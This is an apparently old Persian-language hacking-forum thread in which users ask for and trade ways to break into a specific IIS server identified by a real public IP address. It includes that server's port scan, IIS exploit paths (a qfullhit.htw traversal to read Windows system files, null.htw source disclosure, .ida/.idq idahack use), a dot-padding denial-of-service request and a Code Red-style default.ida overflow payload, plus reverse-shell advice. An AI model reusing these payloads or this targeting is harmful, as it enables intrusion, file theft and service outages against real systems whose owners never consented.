salam.
bebinin.
ye IP server darim
miyaym port scanesh mikonim.
port haye mamooli 80 , 21 , 135 ,.... bazan ok?
ba'ad miyaym ba cg4s scan mikonam .
chand ta adress behem mide .
az in adressha chejoori bayad estefade konam?????????
chejoori exploiteshoon konam . exploit hashoon ro az koja biaram . va va va va va va va va va......................................

Exploit hayee ro ke dari ta Vuln haro baramon inja benevis

ok . ba in scriptha shoma mitooni az tarigh e IDA in server ro hak koni. hamchenin mishhe az hamin tarigh in server ro khaboond (Buffer Overfelow) az tarigh e index.js niz in kar amalist. "CiWebHitsFile=/index.htm&CiRestriction noo E XSS hats ke ba oonmitooni esme file haro ke dar host hastan ro chek koni...va qfullhit.htw mitooni file haro mesle sam ro shekar kon ;)

Mehdi


==============================================
[Only registered and activated users can see links]((kheili bood))
[Only registered and activated users can see links]((oooooooooh!))

/index.js%2570

/examples/jsp/num/numguess.js%70

/example/

/index.html

/survey

/sawmill

/.jsp/WEB-INF/classes/Env.java

/null.htw?CiWebHitsFile=/index.htm&CiRestriction
/null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full

/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full

/test.ida

/test.idq

ina ham result ha
thank you
==============================================

darzemn mani n forum ro HTML esho on kardam. lotfan movazebbashid ke che script E dar inja gharar midid. Post e BlackCodeWriter ro majboor shodam pak konam chon az java estefadeh shodeh bodo dar yeki az Nevehsteh haye Vuln ke address e site ro esoorat e popup be shoma midad....

thank you.

salam
man 64.187.54.199 ro port scan kardam vali porti ke vasse IDAhack beshe estefade kard peida nakardam . age mishe komakam konin ya khodetoonam ye scan konin plz
thank you bye

Port E ke baraye IDA estefadeh msiheh 80 hast. chera? Chon IDA yeki az componentshaye IIS hat.

c:/>idahack 64.187.54.199 80 4 80 ?((nashod ke!))

Aziz bedoone inke chizi ro nakhoondi nagoonemisheh... to mikhay oono rooye port e Default e systeme khodet ke 80 shellkoni? aslan hamchizn chizi emkan dareh...? Boro film E ro ke dorost kardim darin rabete negah kon yad begiri...

[Only registered and activated users can see links]

Rooye port e pishfarz e system e khodet emitooni inkaro bokoni...

man filme amoozeshi ro dide boodam chandin bar
idahack server 80 4 port
ro ham midoonestam.
port scan ke kardam porte monasebi gir nayavordam ke az shoma porsidam
shoma ham goftin porte 80 man khodam ham ta'aajjob kardam . manzoore man porti ke be toure pishfarz baz nist bood

aziz manzooreto man bad fahmidam pas. sorry. Areh bayad pishfarz nabasheh ;) vali javab mideh. albateh hasmiheh say kon ba NC header ro ye chek koni va bebini ke 100% file vojood dareh chon kheyli az scanner ha eshtebah file E ro e vojood nadreh migan vojood dareh. Behtarin rahesh hamoon NC kardan e ;)

TCP: 64.187.54.199 [21-ftp]
TCP: 64.187.54.199 [80-[Only registered and activated users can see links]]
TCP: 64.187.54.199 [25-smtp]
TCP: 64.187.54.199 [53-domain]
TCP: 64.187.54.199 [110-pop3]
TCP: 64.187.54.199 [389-ldap]
TCP: 64.187.54.199 [135-epmap]
TCP: 64.187.54.199 [143-imap]
TCP: 64.187.54.199 [250]
TCP: 64.187.54.199 [445-microsoft-ds]
TCP: 64.187.54.199 [443-[Only registered and activated users can see links]]
TCP: 64.187.54.199 [1002]
TCP: 64.187.54.199 [1077-imgames]
TCP: 64.187.54.199 [1720-h323hostcall]
TCP: 64.187.54.199 [1433-ms-sql-s]
TCP: 64.187.54.199 [3372-tip2]
TCP: 64.187.54.199 [3389-ms-wbt-server]
TCP: 64.187.54.199 [5631-pcanywheredata]
TCP: 64.187.54.199 [8385]
TCP: 64.187.54.199 [8383]
TCP: 64.187.54.199 [8484]

ba NC ham testeshoon kardam baz boodan

bebakhshid ke joda joda shod .
dar mourede down kardanesh ham age momlene be man touzih bedin plz thx.
nahveye down kardanesh plz.

Aziz man ke nemigam baba boro bebin bazeh ya na. Mesle inke nemifahmi man chimigam. Manzoormam ineke Header o bebin ageh IDA roositem hast yana... (ip/NULL.ida) scanner ha hamiesheh alaki javab midan in mored ro).

inam javab e 2vomi
Baraye crash e yek system az tarigh e ida 25KB noghte "." be aval e URL ezafe konid server dar ane vahed down misheh

inam tarighash

[Only registered and activated users can see links][25kb of '.']...ida


==============================================

hala manzooretoon ro fahmidam :D
dige chikar konam newbie hastam :D
agha nazania vali dastoore NC vasse check e header chie ;)
thx

Injas ke yekam bayad shomaharo be kar begiram...loooooooool [Only registered and activated users can see links] boro oonja in maghalaro bekhoon toosh neveshteh ;)

man ke akhar nafahmidam 25 kb of "." chand ta sat
man ba note pad hodoode 100-300 ta noghte gozashtam ke size note pad shod 25 kb vali too browser ja nemishe

plz help me
dar zemn too in amoozeshe netcate chizi dar mourede header nanaevshte bood

Koja too donya didi bara DoS az Browser estefadeh kona. Man ke az in soala kahteh shodam. az in bebad be soalaye dorosthesabi javab midam. Inam yek nemoooneh az exploit ke bejaye "." az az tarigh e buffer va character DoS shodeh

/default.ida?NNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090
%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u 6858%ucbd3%u7801%u9090%u9
090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u000 0%u00=a[Only registered and activated users can see links]

salam
ye serveri ke
_vti_bin/shtml.exe
va null.ida ro dasht vali sp3 dasht
chejoori shell mide?

Ba reverse shell ino mitooni anjam bedi.... albateh in dafeye chandom hast ke migam shtml.exe nemitooneh Shell ro bedeh va faghat shtml.dll ro misheh reverse shell kard ke oon ham niyaz be neveshtan e code dare. Null.ida dar SP e 3 patch shodeh va nemisheh azash stefadeh kard...

Ye file E hast be nam e PC-ISAPI ke be shoma reverse shellr o mideh rooye shtml.dll ke albateh peyda kardanesh kare hazrat e fill e vali begardid ageh peyda kardid ba doostatoon sharesh konid...

salam
estefadeh kardem